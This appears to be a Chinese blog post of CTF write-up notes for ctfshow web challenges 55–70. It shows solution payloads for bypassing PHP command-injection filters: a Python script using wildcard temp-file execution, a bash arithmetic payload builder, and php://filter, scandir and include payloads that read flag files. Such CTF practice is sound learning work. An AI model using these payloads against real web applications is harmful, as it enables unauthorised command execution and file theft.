17.web55
无字母数字的命令执行(ctfshow web入门 55)_ctfshowweb55-CSDN博客
base64也是/bin目录下的可执行程序
18.web56
import requests
while True:
url = "http://2534e197-d33f-4743-857a-a32ba63fee72.challenge.ctf.show/?c=.+/???/????????[@-[]"
r = requests.post(url, files={"file": ('1.txt', b'cat flag.php')})
if r.text.find("ctfshow") > 0:
print(r.text)
break
关于为什么是c=.+/???/????????[@-[]详见p神的文章讲的非常清楚
19.web57
get_reverse_number = "$((~$(({}))))" # 取反操作
negative_one = "$((~$(())))" # -1
payload = get_reverse_number.format(negative_one*37)
print(payload)
在 Python 中,format 方法通常用于格式化字符串。例如,如果你有一个字符串模板,你可以使用 {} 作为占位符,然后使用 format 方法将变量值填充到这些占位符中。
20.web58-65
或者以下两种解法
POST传参:c=highlight_file("flag.php");
POST传参:c=include($_POST['w']);&w=php://filter/convert.base64-encode/resource=flag.php
21.web66
Show_source被过滤
c=include($_POST['w']);&w=php://filter/convert.base64-encode/resource=/flag.txt
CTF中常用的php原生类总结_php原生类ctf-CSDN博客
22.Web68,69,70
c=var_dump(scandir('/'));
c=var_export(scandir('/'));(var_dump被禁用)
c=include('/flag.txt');或者 c=readgzfile("/flag.txt");
标签:txt,web55,base64,命令,flag,70,var,POST,php From: https://blog.csdn.net/m0_72929232/article/details/142553024